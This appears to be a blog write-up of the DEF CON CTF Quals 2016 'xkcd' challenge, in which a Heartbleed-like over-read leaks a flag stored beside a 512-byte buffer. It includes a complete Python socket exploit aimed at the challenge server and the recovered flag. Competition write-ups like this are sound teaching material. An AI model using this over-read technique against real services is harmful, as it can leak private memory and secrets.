Лаборатория DEF CON CTF Quals 2016 - xkcd [1]

delimitry
, 23 мая 2016

http://download.quals.shallweplayaga.me/be4bf26fcb93f9ab8aa193efaad31c3b/xkcd
xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me:1354

Might want to read that comic as well... 1354

We have a binary and a service with this binary.
After quick inspection I've noticed a reference to heartbleed explanation xkcd comic.

Our input data are stored to globals buffer (in .bss segment) - which is 512 bytes long. 
And right after that buffer a flag_buffer (with data from flag file) is located.

So we could input  512 bytes input data to fully fill globals buffer and make it adjacent to the flag buffer.  
After that input the length (letters count)  512 + length of the flag.
I have empirically determined the length of the flag. Here is the final exploit:

import socket

s = socket.socket()
s.settimeout(5)
address = 'xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me'
port = 1354
s.connect((address, port))
payload = 'SERVER, ARE YOU STILL THERE? IF SO, REPLY "%s" (%s LETTERS)\n' % ('A' * 512, 512 + 29)
print payload
s.send(payload)
data = s.recv(2048)
print data

And successfully got the flag.
The flag is: bl33ding h34rt5